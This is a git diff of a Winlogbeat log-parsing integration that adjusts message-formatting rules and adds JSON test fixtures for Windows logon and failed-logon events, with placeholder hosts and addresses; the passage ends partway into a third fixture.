+ "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" } ] }, @@ -43,9 +1640,6 @@ "field": "event.action", "value": "Filtering Platform Connection" }, - { - "field": "winlog.computer_name" - }, { "field": "winlog.event_data.SourceAddress" }, @@ -55,59 +1649,83 @@ ] }, { - "value": "Service Control Manager on {host.hostname}: {event.original}", + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "host.hostname" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "event.original" + "field": "winlog.event_data.SourceAddress" } ] }, { - "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.opcode" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "winlog.computer_name" + "field": "winlog.event_data.DestAddress" } ] }, { - "value": "Sysmon : no event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{00000000-0000-0000-0000-000000000000}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.computer_name" + "field": "event.action", + "value": "Filtering Platform Connection" } ] }, { - "value": "Security event : {event.action} on {winlog.computer_name}", + "value": "Service Control Manager on {host.hostname}: {event.original}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, + "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + } + ] + }, + { + "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "conditions": [ { - "field": "event.action" - }, + "field": "winlog.provider_guid", + "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + } + ] + }, + { + "value": "Sysmon : no event on {winlog.computer_name}", + "conditions": [ { - "field": "winlog.computer_name" + "field": "winlog.provider_guid", + "value": "{00000000-0000-0000-0000-000000000000}" + } + ] + }, + { + "value": "Security event : {event.action} on {winlog.computer_name}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" } ] }, @@ -117,12 +1735,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, diff --git a/Beats/winlogbeat/ingest/parser.yml b/Beats/winlogbeat/ingest/parser.yml index 0ffc5dbf6..7f190c1ff 100644 --- a/Beats/winlogbeat/ingest/parser.yml +++ b/Beats/winlogbeat/ingest/parser.yml @@ -10,6 +10,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.winlog.event_data.Hashes}}" output_field: hash value_sep: "=" diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..fe8a200a5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -0,0 +1,145 @@ +{ + "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..85bda7ac7 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -0,0 +1,193 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + "hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..035469c13 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": 